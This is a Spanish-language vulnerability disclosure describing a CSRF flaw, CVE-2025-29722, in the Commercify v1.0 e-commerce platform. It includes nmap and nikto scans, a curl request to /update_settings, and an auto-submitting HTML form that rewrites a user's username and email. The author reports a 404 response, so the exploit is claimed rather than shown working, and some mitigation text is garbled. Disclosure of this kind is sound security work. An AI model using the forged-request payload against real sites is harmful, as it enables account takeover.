
Cross Site Request Forgery (CSRF) en Commercify v1.0
Descubierto por: David P.S Abraham (alias Davycipher)
CVE-2025-29722 ha sido asignado a esta vulnerabilidad por MITRE Corporation.
Se identificó una vulnerabilidad CSRF en Commercify v1.0, una plataforma de comercio electrónico de código abierto desarrollada por @yassmittal. La aplicación carece de mecanismos adecuados de protección CSRF en endpoints críticos como /update_settings, lo que permite a atacantes elaborar solicitudes maliciosas que modifican datos de usuario cuando se ejecutan desde otro dominio.
El escaneo con nmap reveló que el servicio era accesible a través del puerto 5173, lo que indica un posible servidor de desarrollo.
nmap -p 5173 localhost
A continuación, escaneé la aplicación usando nikto, revelando:
X-Frame-OptionsAccess-Control-Allow-Origin: *)Mientras exploraba la aplicación, sospeché un posible endpoint update_settings basado en las funciones del panel de usuario. Lo probé con:
curl -X POST "http://localhost:5173/update_settings" \
-d "username=attacker&[email protected]"
Aunque se devolvió un 404 Not Found, este comportamiento puede depender del entorno. En implementaciones válidas, esto podría llevar a la manipulación completa de la cuenta.
Ataque basado en HTML para explotar la falla CSRF:
<form action="http://localhost:5173/update_settings" method="POST">
<input type="hidden" name="username" value="attacker">
<input type="hidden" name="email" value="[email protected]">
</form>
<script>
document.forms[0].submit();
</script>
SameSite en cookies*)SameSite=Strict o Lax en las cookiesDavid P.S. Abraham
Alias: Davycipher